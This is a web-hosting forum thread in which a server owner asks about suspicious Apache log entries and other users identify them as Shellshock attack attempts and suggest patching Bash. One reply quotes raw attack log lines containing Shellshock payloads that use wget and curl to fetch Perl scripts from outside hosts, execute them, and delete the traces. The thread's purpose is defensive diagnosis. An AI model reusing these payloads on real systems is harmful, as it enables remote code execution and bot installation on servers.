Looks like someone trying to upload files to the server

tank · Nov 11, 2014

I noticed this is my apache error log.

Code:

[Tue Nov 11 17:42:53.073036 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Connecting to 209.20.86.222:80... 
[Tue Nov 11 17:42:53.135079 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: connected.
[Tue Nov 11 17:42:53.135164 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: HTTP request sent, awaiting response... 
[Tue Nov 11 17:42:53.197484 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 200 OK
[Tue Nov 11 17:42:53.197549 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Length: 7488 (7.3K) [text/plain]
[Tue Nov 11 17:42:53.197583 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: Saving to: `/tmp/jack.jpg'
[Tue Nov 11 17:42:53.197596 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
[Tue Nov 11 17:42:53.197615 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:      0K ...
[Tue Nov 11 17:42:53.259697 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: ....                  
[Tue Nov 11 17:42:53.259778 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:                              100%  118K=0.06s
[Tue Nov 11 17:42:53.259793 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
[Tue Nov 11 17:42:53.260010 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 2014-11-11 17:42:53 (118 KB/s) - `/tmp/jack.jpg' saved [7488/7488]
[Tue Nov 11 17:42:53.260030 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
[Tue Nov 11 17:42:53.264777 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: 
[Tue Nov 11 17:42:53.264817 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: curl: (3)  malformed
[Tue Nov 11 17:42:53.327853 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
[Tue Nov 11 17:42:53.328035 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:                                  Dload  Upload   Total   Spent    Left  Speed
[Tue Nov 11 17:42:53.328119 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: \r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
[Tue Nov 11 17:42:53.453541 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215: \r101  7488
[Tue Nov 11 17:42:53.453691 2014] [cgi:error] [pid 19736] [client 5.39.86.39:1500] AH01215:   101  7488    0     0  39691      0 --:--:-- --:--:-- --:--:-- 59904

I looked for this file that was uploaded but could not find it.

How do I disable this and or what is this?

24x7server · Nov 12, 2014

Hello,

I will suggest you please install mod_sec on your server with maldetect scanning, so that maldetect will be scan file while uploading on your server.

https://www.rfxn.com/projects/linux-malware-detect/

malk315 · Nov 13, 2014

This looks like a shellshock attack attempt. It tried to download jack.jpg from a server in Germany and run it (it is a perl script) which then sets up some type of bot that may be controlled through IRC or something. I cleaned one up and updated Bash recently.

Log:
Code:
165.233.46.204 - - [03/Nov/2014:11:36:19 -0500] "GET / HTTP/1.1" 302 287 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget www.freistilreisen.de/jack.jpg -O
 /tmp/jack.jpg;curl -O /tmp/jack.jpg www.freistilreisen.de/jack.jpg;perl /tmp/jack.jpg;rm -rf /tmp/jack.jpg*\");'"
Here's another one:
Code:
81.145.204.4 - - [18/Oct/2014:07:16:45 -0400] "GET /cgi-bin/bin/view/TWiki/WebHome HTTP/1.1" 302 317 "() { :;}; /bin/bash -c \\x22cd /tmp;wget  http://74.52.27.243/lifesux.txt;perl /tmp/lifesux.txt;rm -rf /tm
p/lifesux.txt\\x22" "() { :;}; /bin/bash -c \\x22cd /tmp;wget http://74.52.27.243/lifesux.txt;perl /tmp/lifesux.txt;rm -rf  lifesux.txt\\x22"
The telltale sign that a request is trying to exploit shellshock vulnerability in your BASH shell is the beginning function definition:
Code:
() { :; }
If you have an old version of BASH, update -- might need to build from source unless your box is really new.

There are lots of good sites out there that explain how to deal w/ shellshock.
I found this one quite helpful:

https://shellshocker.net/

Good luck.

tank · Nov 14, 2014

thanks guys for your answers. I will take a look.

Forums

The Community Forums

Interact with an entire community of cPanel & WHM users!

Looks like someone trying to upload files to the server

tank Well-Known Member

24x7server Well-Known Member

malk315 Registered

tank Well-Known Member

SOLVED Access key found but it looks like logins not working

SOLVED [CPANEL-20518] Spam Box only looks for spam in the default cPanel email account

Give access to someone via SSH key

Share This Page

Useful Searches

The Community Forums

Interact with an entire community of cPanel & WHM users!

Looks like someone trying to upload files to the server

tank Well-Known Member

24x7server Well-Known Member

malk315 Registered

tank Well-Known Member

SOLVED Access key found but it looks like logins not working

SOLVED [CPANEL-20518] Spam Box only looks for spam in the default cPanel email account

Give access to someone via SSH key

Share This Page